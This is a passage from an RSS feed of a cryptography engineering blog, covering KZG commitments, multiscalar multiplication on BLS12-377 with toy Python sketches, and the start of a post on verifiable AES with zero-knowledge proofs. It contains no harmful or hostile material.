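    assert (a[0] + u * carry) % P_MOD == 0, "P(u) does not equal v"
    return q

P = [3, 2, 1]               # P(x) = x^2 + 2x + 3
u = 5
v = poly_eval(P, u)         # v = P(5) = 38
Q = quotient(P, u, v)       # Q(x) satisfying P(x) - v = Q(x)(x - u)
r = 11                      # spot-check the identity at an arbitrary point
assert (poly_eval(Q, r) * (r - u)) % P_MOD == (poly_eval(P, r) - v) % P_MOD
```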
&lt;p&gt;The verifier accepts the proof if $(\alpha-u)\mathrm{cm}(Q)=\mathrm{cm}(P)-vg$. The problem is that we do not know $\alpha$. This is where &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;vitalik.ca&#x2F;general&#x2F;2017&#x2F;01&#x2F;14&#x2F;exploring_ecp.html&quot;&gt;pairings&lt;&#x2F;a&gt; come to our aid: with them, the elements $g_2$ and $\alpha g_2$ from the setup suffice to perform the check. Roughly speaking, an elliptic curve pairing is a function&lt;br &#x2F;&gt;
$f: \mathcal{G}_1 \times \mathcal{G}_2\rightarrow \mathcal{G}_t$&lt;br &#x2F;&gt;
which takes two elements, $P$ from $\mathcal{G}_1$ and $Q$ from $\mathcal{G}_2$ and outputs an element $R$ from $\mathcal{G}_t$. All the groups have the same order $r$ and correspond to groups in pairing-friendly elliptic curves. In the case of MARLIN, we use the &lt;a href=&quot;&#x2F;multiscalar-multiplication-strategies-and-challenges&#x2F;&quot;&gt;curve BLS 12-377&lt;&#x2F;a&gt;. The pairing satisfies the following:&lt;br &#x2F;&gt;
$f(P,Q)=f(g,g_2)^{pq}$&lt;br &#x2F;&gt;
where $g$ and $g_2$ are generators for the groups $\mathcal{G}_1$ and $\mathcal{G}_2$ (and $P=pg$ and $Q=qg_2$). The form of the verification equation in terms of pairings is&lt;br &#x2F;&gt;
$f(\mathrm{cm}(Q),(\alpha-u)g_2)=f(\mathrm{cm}(P)-vg,g_2)$&lt;br &#x2F;&gt;
We do the check over $\mathcal{G}_t$. We only need to know $\alpha g_2$ from the trusted setup.&lt;&#x2F;p&gt;
&lt;p&gt;How can we be convinced that if we evaluated the polynomials at a single point and they coincide, then it is likely that the argument is true? The answer lies with the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Schwartz%E2%80%93Zippel_lemma&quot;&gt;Schwartz-Zippel lemma&lt;&#x2F;a&gt; (we will state it for finite fields): for a nonzero polynomial $P$ of degree $d$ over a finite field of order $p$, the probability that the polynomial is zero at a point $r$ sampled at random is at most&lt;br &#x2F;&gt;
$\mathrm{Pr}(P(r)=0)\leq d&#x2F;p$&lt;br &#x2F;&gt;
Given that the maximum size of circuits (which gives the maximum degree of a polynomial) is around $2^{26}\approx 10^8$ and the size of the field is larger than $2^{256}$, the probability is at most $2^{-230}\approx 10^{-70}$. If $P_1$ and $P_2$ coincide at one point $r$, we can construct the polynomial $P(x)=P_1(x)-P_2(x)$ (polynomials are closed under subtraction) and $P(r)=0$. Given how unlikely it is to hit a zero at random, we are confident that $P(x)$ is the zero polynomial.&lt;&#x2F;p&gt;
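&lt;p&gt;A quick sanity check of the lemma in Python (toy modulus $97$ and a made-up polynomial): a degree-$d$ polynomial over a field has at most $d$ roots, so a uniformly random point hits one with probability at most $d&#x2F;p$:&lt;&#x2F;p&gt;

```python
P_MOD = 97

def poly_eval(coeffs, x):
    # Horner evaluation; coeffs[i] is the coefficient of x**i
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P_MOD
    return acc

# P(x) = (x - 3)(x - 10) = x^2 - 13x + 30: degree 2, hence at most 2 roots
coeffs = [30, (-13) % P_MOD, 1]
roots = [x for x in range(P_MOD) if poly_eval(coeffs, x) == 0]
assert roots == [3, 10]
# so Pr[P(r) = 0] = 2/97 for uniform r, within the d/p bound
```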
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Zk-SNARKs have started gaining attention due to their use in developing fully private applications. They provide succinct proofs that a specific computation was carried out correctly without revealing sensitive information. There are many possible constructions, most based on probabilistic proofs and a commitment scheme. Depending on the different choices, more efficient versions are possible and determine the type of computation (machine or circuit computation). We explored the KZG commitment scheme, which shows the idea behind systems such as MARLIN and Plonk and the calculations we need to generate and verify the proofs.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Multiscalar Multiplication: Strategies and Challenges</title>
          <pubDate>Mon, 09 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/multiscalar-multiplication-strategies-and-challenges/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/multiscalar-multiplication-strategies-and-challenges/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/multiscalar-multiplication-strategies-and-challenges/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Generating a zk-SNARK (zero-knowledge succinct non-interactive argument of knowledge), such as the one Aleo uses, involves a lot of cryptographic calculations, almost all of which happen inside an elliptic curve over a finite field.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;elliptic-curves&quot;&gt;Elliptic Curves&lt;&#x2F;h2&gt;
&lt;p&gt;The following is a short version of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cryptographyinrustforhackers.com&#x2F;chapter_2.html#elliptic-curves&quot;&gt;this&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;An elliptic curve point is a pair of numbers $(x,y)$ in a finite field (you can think of a finite field as $Z_p$, the integers modulo some huge prime number, though sometimes they’re more than that), which satisfy an equation of the form:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
y^2 = x^3 + ax + b&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;for some $a$ and $b$ in the finite field.&lt;&#x2F;p&gt;
&lt;p&gt;You can sum elliptic curve points, but not in the traditional way. Instead of doing&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
(x_1, y_1) + (x_2, y_2) = (x_1 + x_2, y_1 + y_2)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;We do this:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
(x_1, y_1) + (x_2, y_2) = (x_3, y_3)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;where&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
x_3 = s^2 - x_1 - x_2 \&lt;br &#x2F;&gt;
y_3 = s(x_1 - x_3) - y_1 \&lt;br &#x2F;&gt;
s = \frac{y_2 - y_1}{x_2 - x_1}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;There are two exceptions to this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. When $(x_1, y_1) = (x_2, y_2)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. When $x_1 = x_2$ but $y_1 \neq y_2$. In this case, as no other solution exists, $y_1 = - y_2$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In both 1. and 2. the calculation above is not defined (we would be dividing by zero), so what we do instead is:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The sum of a point with itself is, as before, a point $(x_3, y_3)$, only in this case  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
x_3 = s^2 - 2 x_1 \&lt;br &#x2F;&gt;
y_3 = s(x_1 - x_3) - y_1 \&lt;br &#x2F;&gt;
s = \dfrac{3 x_1^2 + a}{2 y_1}&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
(Here, $a$ is the coefficient defining the curve equation above).
2. In this case, the result of the sum is a unique point we arbitrarily add to the curve, called the &lt;em&gt;point at infinity&lt;&#x2F;em&gt; and noted $\mathcal{O}$. This point works as the zero for our sum, i.e.,&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
\mathcal{O} + (x, y) = (x, y)&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
for every $(x,y)$.&lt;&#x2F;p&gt;
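&lt;p&gt;The addition rules above, including both exceptional cases, can be sketched in Python over a toy curve (the parameters $y^2 = x^3 + x + 1$ over $\mathbb{F}_{23}$ are chosen only for illustration):&lt;&#x2F;p&gt;

```python
# Toy curve y^2 = x^3 + a*x + b over F_p with a = 1, b = 1, p = 23.
P_MOD, A = 23, 1
INF = None  # the point at infinity, the identity of the group

def ec_add(p1, p2):
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return INF   # exception 2: opposite points sum to infinity
    if p1 == p2:
        # exception 1 (doubling): tangent slope, pow(..., -1, p) inverts mod p
        s = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD) % P_MOD
    else:
        # generic case: chord slope
        s = (y2 - y1) * pow(x2 - x1, -1, P_MOD) % P_MOD
    x3 = (s * s - x1 - x2) % P_MOD
    y3 = (s * (x1 - x3) - y1) % P_MOD
    return (x3, y3)

assert ec_add((0, 1), (1, 7)) == (12, 19)   # chord case
assert ec_add((0, 1), (0, 1)) == (6, 19)    # tangent (doubling) case
assert ec_add((0, 1), (0, 22)) is INF       # opposite points
assert ec_add(INF, (0, 1)) == (0, 1)        # infinity acts as zero
```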
&lt;h2 id=&quot;primitive-operations&quot;&gt;Primitive operations&lt;&#x2F;h2&gt;
&lt;p&gt;Elliptic curve cryptography ultimately relies on two primitive operations, point addition (adding two different points) and point doubling (adding a point to itself), which we call &lt;code&gt;ECADD&lt;&#x2F;code&gt; and &lt;code&gt;ECDBL&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We can apply the double-and-add algorithm if we try to add a point many times to itself. As already explained &lt;a href=&quot;&#x2F;what-every-developer-needs-to-know-about-elliptic-curves&#x2F;&quot;&gt;in one of our posts&lt;&#x2F;a&gt;, the idea is simple: if we want to calculate, say, $9P$ for some curve point $P$, instead of performing nine additions we can do&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
P + P = 2P \&lt;br &#x2F;&gt;
2P + 2P = 4P \&lt;br &#x2F;&gt;
4P + 4P = 8P \&lt;br &#x2F;&gt;
4P + P = 9P&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;which is only four addition operations.&lt;&#x2F;p&gt;
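&lt;p&gt;A minimal sketch of double-and-add in Python (integers under addition stand in for curve points here, so the same routine works with &lt;code&gt;ECADD&lt;&#x2F;code&gt;&#x2F;&lt;code&gt;ECDBL&lt;&#x2F;code&gt; plugged in as &lt;code&gt;add&lt;&#x2F;code&gt;):&lt;&#x2F;p&gt;

```python
def double_and_add(k, point, add, identity):
    # computes k*P with O(log k) group operations instead of k - 1 additions
    result, base = identity, point
    while k:
        k, bit = divmod(k, 2)
        if bit:
            result = add(result, base)  # accumulate this power-of-two multiple
        base = add(base, base)          # double for the next bit
    return result

# stand-in group: integers under addition; 9*5 = 45 in four "doublings"
# and two "additions", matching the 9P example above
assert double_and_add(9, 5, lambda a, b: a + b, 0) == 45
assert double_and_add(0, 5, lambda a, b: a + b, 0) == 0
```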
&lt;p&gt;When we have to add many different points $k_1P_1+k_2P_2+…+k_nP_n$, most techniques assume these primitives are given and focus on how to perform the scalar multiplications $k_i P_i$ and the additions, minimizing the amount of &lt;code&gt;ECADD&lt;&#x2F;code&gt;s and &lt;code&gt;ECDBL&lt;&#x2F;code&gt;s.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;msm&quot;&gt;MSM&lt;&#x2F;h2&gt;
&lt;p&gt;The &lt;em&gt;Multi-Scalar Multiplication&lt;&#x2F;em&gt; problem consists of, given an elliptic curve, calculating&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\sum_{i=1}^{n} k_i P_i&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;for some scalars (a.k.a. integers modulo a certain prime) $k_i$, some elliptic curve points $P_i = (x_i, y_i)$ and some $n$ (in Aleo’s challenge it is $2^{26}$).&lt;&#x2F;p&gt;
&lt;p&gt;The sum operation here is the one discussed in the previous section. Similarly, $k_i P_i$ means “$P_i$ summed to itself $k_i$ times,” the sum once again being the one defined above.&lt;&#x2F;p&gt;
&lt;p&gt;Around 80% of the time to produce a zk-SNARK proof is spent doing MSM, so optimizing it is crucial for performance.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;bucketing-method&quot;&gt;Bucketing method&lt;&#x2F;h3&gt;
&lt;p&gt;We can break the MSM into smaller sums and reduce the number of operations by repeatedly using the windowing technique. If we want to compute each $k_iP_i$, we can break it into windows of size $c$&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
k_iP_i=k_{i0}P_i+k_{i1}2^{c} P_i+k_{i2}2^{2c} P_i+…+k_{i,m-1}2^{c(m-1)} P_i&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
Using this, we can rewrite the MSM problem as&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
P=\sum_{i} k_iP_i=\sum_{i}\sum_{j} k_{ij}2^{cj}P_i&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
We can now change the order of the summations,&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
P=\sum_{i} k_iP_i=\sum_{j}2^{cj}\left(\sum_{i} k_{ij}P_i\right)=\sum_j 2^{cj} B_j&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
In other words, we first divide the scalars into windows and then combine all the points in each window. Now we can focus on how to calculate each $B_j$ efficiently:&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
B_j=\sum_{i} k_{ij}P_i=\sum_{\lambda=1}^{2^c-1} \lambda \sum_{u(\lambda)} P_u&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
where the summation over $u(\lambda)$ is done only over points whose coefficient is $\lambda$. For example, if $c=3$ and we have $15$ points,&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
B_1=4P_1+3P_2+5P_3+1P_4+4P_5+6P_7+6P_8+3P_{14}+5P_{15}&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
We can split the summation by the coefficients $\lambda$, taking values from $1$ to $7$. For $\lambda=1$, $\sum_u P_u=P_4$ (because $P_4$ is the only one with coefficient $1$), for $\lambda=4$, $\sum_u P_u=P_1+P_5$, etc. We place all points with a common coefficient $\lambda$ into the $\lambda$ bucket. Thus,&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
B_j=\sum_\lambda \lambda S_{j\lambda}=S_{j1}+2S_{j2}+3S_{j3}+4S_{j4}+5S_{j5}+6S_{j6}+7S_{j7}&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
We can calculate this with a minimum number of point additions using partial sums.&lt;br &#x2F;&gt;
$T_{j1}=S_{j7}$&lt;br &#x2F;&gt;
$T_{j2}=T_{j1}+S_{j6}$&lt;br &#x2F;&gt;
$T_{j3}=T_{j2}+S_{j5}$&lt;br &#x2F;&gt;
$T_{j4}=T_{j3}+S_{j4}$&lt;br &#x2F;&gt;
$T_{j5}=T_{j4}+S_{j3}$&lt;br &#x2F;&gt;
$T_{j6}=T_{j5}+S_{j2}$&lt;br &#x2F;&gt;
$T_{j7}=T_{j6}+S_{j1}$&lt;br &#x2F;&gt;
Each of these operations involves doing just one elliptic point addition. We can obtain the final result by summing these partial sums:&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
B_j=\sum T_{jk}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
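&lt;p&gt;Putting the pieces together, here is a sketch of the bucketing method in Python (again with integers under addition standing in for curve points, so &lt;code&gt;add&lt;&#x2F;code&gt; plays the role of &lt;code&gt;ECADD&lt;&#x2F;code&gt;; the window size and test scalars are arbitrary choices):&lt;&#x2F;p&gt;

```python
def bucket_msm(scalars, points, c, add, identity):
    # Pippenger-style bucket method with window size c
    num_windows = (max(scalars).bit_length() + c - 1) // c
    total = identity
    for j in reversed(range(num_windows)):
        for _ in range(c):
            total = add(total, total)      # shift the accumulator by 2^c
        # bucket lam collects every point whose j-th window digit is lam
        buckets = [identity] * 2 ** c
        for k, p in zip(scalars, points):
            lam = (k // 2 ** (c * j)) % 2 ** c
            if lam:
                buckets[lam] = add(buckets[lam], p)
        # partial-sum trick: window_sum = sum(lam * buckets[lam]) using
        # two additions per bucket instead of lam additions
        window_sum, running = identity, identity
        for lam in reversed(range(1, 2 ** c)):
            running = add(running, buckets[lam])
            window_sum = add(window_sum, running)
        total = add(total, window_sum)
    return total

scalars, points = [4, 3, 5, 1, 4, 6], [7, 11, 13, 2, 5, 3]
expected = sum(k * p for k, p in zip(scalars, points))
assert bucket_msm(scalars, points, 3, lambda a, b: a + b, 0) == expected
```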
&lt;p&gt;We can improve the calculations by changing the expansion of the coefficients $k_i$. In binary representation, the Hamming weight is the number of non-zero bits. Ideally, we would like this weight to be as small as possible to reduce the number of additions (for example, 65537, which is $2^{16}+1$, is used as the public exponent for the RSA cryptosystem in many implementations; the square-and-multiply algorithm then requires only 16 squarings and one multiplication). The average Hamming weight in a binary representation is $1&#x2F;2$; if we introduce a signed binary representation ($-1,0,1$), the average weight is reduced to $1&#x2F;3$, with the consequent decrease in the number of operations (on average).&lt;&#x2F;p&gt;
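&lt;p&gt;A common signed binary representation is the non-adjacent form (NAF); a minimal Python sketch of the textbook digit recurrence, shown here for illustration:&lt;&#x2F;p&gt;

```python
def naf(k):
    # non-adjacent form: digits in {-1, 0, 1}, no two adjacent non-zeros;
    # least significant digit first
    digits = []
    while k:
        if k % 2:
            d = 2 - (k % 4)   # +1 if k = 1 mod 4, -1 if k = 3 mod 4
            k -= d
        else:
            d = 0
        digits.append(d)
        k //= 2
    return digits

# 7 = 111 in binary (weight 3) but 8 - 1 in NAF (weight 2)
assert naf(7) == [-1, 0, 0, 1]
# the representation is exact: reconstruct k from its signed digits
assert sum(d * 2 ** i for i, d in enumerate(naf(12345))) == 12345
```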
&lt;h2 id=&quot;bls-12-377&quot;&gt;BLS 12-377&lt;&#x2F;h2&gt;
&lt;p&gt;The curve which Aleo uses is called BLS 12-377. The base field (finite field) has order $q$ (a 377-bit prime), and the curve has an embedding degree of 12. Both the order $r$ of the elliptic curve group $G_1$ and the order $q$ of the base field are highly 2-adic (that is, both $q$ and $r$ can be written as $2^\alpha m+1$, where $m$ is an odd number and $\alpha$ is greater than $40$). The orders $q$ and $r$ are related by the embedding degree: $r \mid q^{12}-1$. The equation for the elliptic curve is&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
y^2=x^3+1&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Additionally, we can build a second group $G_2$ over a quadratic field extension of $\mathbb{F}_q$; the equation of the curve is&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
y^2=x^3+B&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
where $B$ is a parameter. For more information on the curve’s parameters, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.rs&#x2F;ark-bls12-377&#x2F;latest&#x2F;ark_bls12_377&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;BLS 12-377 is birationally equivalent to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;datatracker.ietf.org&#x2F;doc&#x2F;html&#x2F;draft-irtf-cfrg-hash-to-curve-05#appendix-B&quot;&gt;Montgomery and twisted Edwards curves&lt;&#x2F;a&gt;. This allows us to perform point addition and scalar multiplication faster by avoiding costly field inversions. In the case of Montgomery curves, it is possible to perform scalar multiplication in constant time, making the operation resistant to timing attacks.&lt;&#x2F;p&gt;
&lt;p&gt;Implementations of the BLS 12-377 curve and the (birationally equivalent) twisted Edwards curve are given in this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;arkworks-rs&#x2F;curves&quot;&gt;repository&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;BLS 12-377 is one of the pairing-friendly elliptic curves; these have applications such as short digital signatures that are efficiently aggregatable, polynomial commitment schemes, and one-round multi-party key exchanges.&lt;br &#x2F;&gt;
The reason why we have two equations for the BLS curve and two groups is related to pairings. A pairing is a bilinear map: it takes two points, each from a group of prime order $r$. For technical reasons, these groups need to be different. As the original curve has only one subgroup of order $r$, we need to extend the field to find other groups of order $r$. The embedding degree tells us how far we have to extend the field to find those other groups. As a bonus, the extended field contains all the $r$-th roots of unity.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;a-note-on-field-extensions&quot;&gt;A note on Field Extensions&lt;&#x2F;h3&gt;
&lt;p&gt;The embedding degree is also the degree of the field extension we need to use. Familiar examples of field extensions are the real numbers, $\mathbb{R}$ (extending the field of rational numbers, $\mathbb{Q}$; this is a transcendental extension), and the complex numbers, \( \mathbb{C} \) (extending \( \mathbb{R} \)). The latter cannot be further extended, since there are no irreducible polynomials of degree greater than one over \( \mathbb{C} \) (we say that the complex numbers are algebraically closed).&lt;&#x2F;p&gt;
&lt;p&gt;If we want to build a quadratic extension of \( \mathbb{F_{q}} \), \( \mathbb{F_{q^2}}\) we can think of it as a polynomial \( a_0+a_1x \), where \( a_0\) and \( a_1 \) are elements in \( \mathbb{F_q} \). The addition is straightforward since we add the independent and linear terms separately. For multiplication, given elements $a$ and $b$&lt;br &#x2F;&gt;
\[ a\times b = a_0b_0 +(a_0b_1+a_1b_0)x+a_1b_1 x^2\]&lt;&#x2F;p&gt;
&lt;p&gt;To avoid the problem of going outside linear polynomials, we can reduce the degree by using an irreducible polynomial, such as \( x^2+1 \), and setting \( x^2+1=0 \). Substituting \( x^2=-1 \) into the equation above,&lt;br &#x2F;&gt;
\[ a\times b = a_0b_0 - a_1b_1 +(a_0b_1+a_1b_0)x\]&lt;br &#x2F;&gt;
which resembles multiplication in complex numbers.&lt;&#x2F;p&gt;
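This multiplication rule can be sketched in a few lines. The prime $q=7$ below is an illustrative toy choice (any prime with $q \equiv 3 \pmod 4$ keeps \( x^2+1 \) irreducible), not the real 377-bit base field, and the function name is an assumption:

```rust
// Toy multiplication in F_{q^2} = F_q[x]/(x^2 + 1) for a small prime q
// with q ≡ 3 (mod 4), so x^2 + 1 is irreducible. An element a0 + a1*x
// is stored as the pair (a0, a1); inputs are assumed reduced mod Q.
const Q: u64 = 7;

fn mul_fq2(a: (u64, u64), b: (u64, u64)) -> (u64, u64) {
    let (a0, a1) = a;
    let (b0, b1) = b;
    // (a0 + a1 x)(b0 + b1 x) = a0 b0 - a1 b1 + (a0 b1 + a1 b0) x,
    // after setting x^2 = -1. Adding Q*Q keeps the subtraction
    // non-negative before reducing mod Q.
    let c0 = (a0 * b0 + Q * Q - a1 * b1) % Q;
    let c1 = (a0 * b1 + a1 * b0) % Q;
    (c0, c1)
}
```

For example, the element \( x \) squared gives \( -1 \), i.e. $(0,1)\times(0,1)=(q-1,0)$, exactly as $i^2=-1$ for complex numbers.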
&lt;p&gt;The conditions for choosing the polynomial are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. It must have the same degree as the extension field (quadratic in our case).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. It must be irreducible in the field we are extending, meaning that we cannot factor it into smaller degree polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Arithmetic in \( \mathbb{F_{q^{12}}} \) is complicated and expensive. Luckily, we can perform a sextic twist so that the group \( G_2 \) is defined over \( \mathbb{F_{q^{2}}} \).&lt;&#x2F;p&gt;
&lt;p&gt;In practice, when we want to build a field extension such as \( \mathbb{F_{q^{12}}} \), we can proceed by extending smaller fields in a sequential form: a tower of extensions (such as \( \mathbb{Q}\rightarrow \mathbb{R}\rightarrow \mathbb{C} \)).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;faster-with-fft&quot;&gt;Faster with FFT&lt;&#x2F;h2&gt;
&lt;p&gt;The potential use for FFTs comes when implementing the primitives &lt;code&gt;ECADD&lt;&#x2F;code&gt; and &lt;code&gt;ECDBL&lt;&#x2F;code&gt;. We can do these operations in different coordinate systems. As stated &lt;a href=&quot;&#x2F;need-for-speed-elliptic-curves-chapter&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;, projective coordinates are typically much faster because they avoid doing a finite field inversion, which is much more expensive than multiplications and additions.&lt;&#x2F;p&gt;
&lt;p&gt;When using projective coordinates, the calculations are faster because we trade divisions for multiplications. This means there are a lot of multiplications to be done, which is why we need efficient methods to multiply integers, where Karatsuba’s, Toom’s, or FFT algorithms might become appealing since we are dealing with &lt;a href=&quot;&#x2F;weird-ways-to-multiply-really-fast-with-karatsuba-toom-cook-and-fourier&#x2F;&quot;&gt;multiplication of large integers&lt;&#x2F;a&gt;. The optimal algorithm will depend on the size of the integers.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Verifiable AES: encryption using zero-knowledge proofs</title>
          <pubDate>Sat, 07 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/verifiable-encryption-using-zero-knowledge-proofs/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/verifiable-encryption-using-zero-knowledge-proofs/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/verifiable-encryption-using-zero-knowledge-proofs/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2023&#x2F;01&#x2F;download-1.jpeg&quot; alt=&quot;download-1&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;scope&quot;&gt;Scope&lt;&#x2F;h2&gt;
&lt;p&gt;At LambdaClass, we want to try and test different cryptographic primitives that we can use to develop new products and applications to empower individuals and organizations, with an increased focus on security and requiring minimal trust between parties. In a series of posts, we will cover powerful primitives such as zero-knowledge proofs and fully homomorphic encryption, their applications, and use cases.&lt;&#x2F;p&gt;
&lt;p&gt;Encryption is the process of transforming messages into random-looking text to ensure confidentiality between two parties.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is our objective here?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
We want to generate proof allowing us to verify an encryption algorithm, ensuring it does what it was designed for.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why do we need this?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
We need this so that the user does not need to trust that the other party performed the encryption correctly; we replace trust with cryptographic proofs. There are a few use cases where the receiver doesn’t want to decrypt the message unless there is an emergency, but at the same time needs to be sure the encryption was done correctly, so that the message is there waiting to be opened.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;When is this useful?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Whenever we want to receive unknown data from untrusted parties in a secure way and be sure that we are not being cheated.&lt;&#x2F;p&gt;
&lt;p&gt;The repository of the project can be found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;AES_zero_knowledge_proof_circuit&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;general-introduction&quot;&gt;General Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Two parties (we will call them Alice and Bob) can communicate securely by using encryption schemes. We can broadly classify encryption schemes into the following categories:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Private (symmetric) key encryption. Commonly used methods are AES and ChaCha20.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Public (asymmetric) key encryption. Commonly used methods are RSA and ElGamal.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
